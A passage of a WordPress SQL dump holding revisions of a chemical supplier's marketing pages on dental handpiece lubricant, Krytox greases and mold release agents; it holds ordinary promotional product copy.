both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[product_categories number="10" parent="0" columns="4" title="Our categories"]\r\n\r\nMore about FluoroExtreme Dental Handpiece Lubricant can be found by <a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricants/">clicking this.</a>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-07 13:53:28', '2016-10-07 13:53:28', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2368, 2, '2016-10-07 13:54:05', '2016-10-07 13:54:05', '<span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span>\r\n\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\nMore about FluoroExtreme Dental Handpiece Lubricant can be found by <a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricants/">clicking this.</a>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-07 13:54:05', '2016-10-07 13:54:05', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2369, 2, '2016-10-07 13:55:14', '2016-10-07 13:55:14', '<span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span>\r\n\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="MS Medical" ]\r\n\r\n&nbsp;\r\n\r\nMore about FluoroExtreme Dental Handpiece Lubricant can be found by <a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricants/">clicking this.</a>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-07 13:55:14', '2016-10-07 13:55:14', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2370, 2, '2016-10-07 13:56:13', '2016-10-07 13:56:13', '<p><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></p>\n<p>Few medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.</p>\n<p>Pictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.</p>\n<p>In contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.</p>\n<p><strong>Product Description</strong></p>\n<p>FluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.</p>\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\n<ul>\n<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\n<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\n<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>\n[ux_product_categories ids="12" number="10"]\n\n<p>&nbsp;</p>\n<p>More about FluoroExtreme Dental Handpiece Lubricant can be found by <a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricants/">clicking this.</a></p>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-07 13:56:13', '2016-10-07 13:56:13', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2371, 2, '2016-10-07 14:04:10', '2016-10-07 14:04:10', '<strong>Krytox Lube For Life</strong>\r\n\r\n<strong>A North American company improves equipment reliability by switching lubricants.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox AUT" ]\r\n\r\nTo learn more about Krytox Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-07 14:04:10', '2016-10-07 14:04:10', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2372, 2, '2016-10-07 14:05:14', '2016-10-07 14:05:14', '<p><strong>Krytox Lube For Life</strong></p>\n<p><strong>A North American company improves equipment reliability by switching lubricants.</strong></p>\n<p>A major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.</p>\n<p><strong>The Challenge</strong></p>\n<p>For this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.</p>\n<p><strong>The Solutions</strong></p>\n<p>After researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\n<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\n<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\n</ul>\n<p>Krytox greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.</p>\n<p>Krytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.</p>\n[ux_product_categories ids="37" number="10"]\n\n<p>To learn more about Krytox Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a></p>', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-07 14:05:14', '2016-10-07 14:05:14', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2373, 2, '2016-10-07 14:12:42', '2016-10-07 14:12:42', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Release Agents" ]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 14:12:42', '2016-10-07 14:12:42', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2374, 2, '2016-10-07 14:13:41', '2016-10-07 14:13:41', '<p>Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:</p>\n<ul>\n<li>Surface adhesion and durability</li>\n<li>Ability to form a thin-film</li>\n<li>Sufficient surface slip</li>\n<li>Chemical inertness to the molding process and molding substrate</li>\n<li>Number of releases per application</li>\n</ul>\n<p>Release agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.</p>\n<p>Miller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.</p>\n<p><strong>PTFE Release Agents</strong></p>\n<p>[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]</p>\n<p>Miller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.</p>\n<p><strong>Thermoset polysiloxanes</strong></p>\n<p>[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]</p>\n<p>Thermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.</p>\n<p>Miller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.</p>\n[ux_product_categories ids="21,16,20" number="10"]\n\n<p>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></p>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 14:13:41', '2016-10-07 14:13:41', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2375, 2, '2016-10-07 14:36:11', '2016-10-07 14:36:11', '<h1><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox™ XHT</strong></h1>\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option. Krytox™ XHT greases and oils help alleviate these issues.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox™, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n<h4><strong>What are Krytox™ XHT lubricants?</strong></h4>\r\nKrytox™ XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox™ the most robust family of lubricants available.\r\n<h4><strong>SOLUTION: Krytox™ XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></h4>\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox™ lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox™ XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox™, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox™ XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox™ has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox™ XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox™ XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n<h4><strong>PERFORMANCE: Krytox™ XHT—The lubricant for hot, hot, hot applications</strong></h4>\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\r\n\r\nKrytox™ XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox™ XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories ids="115,116" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox™ XHT.\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 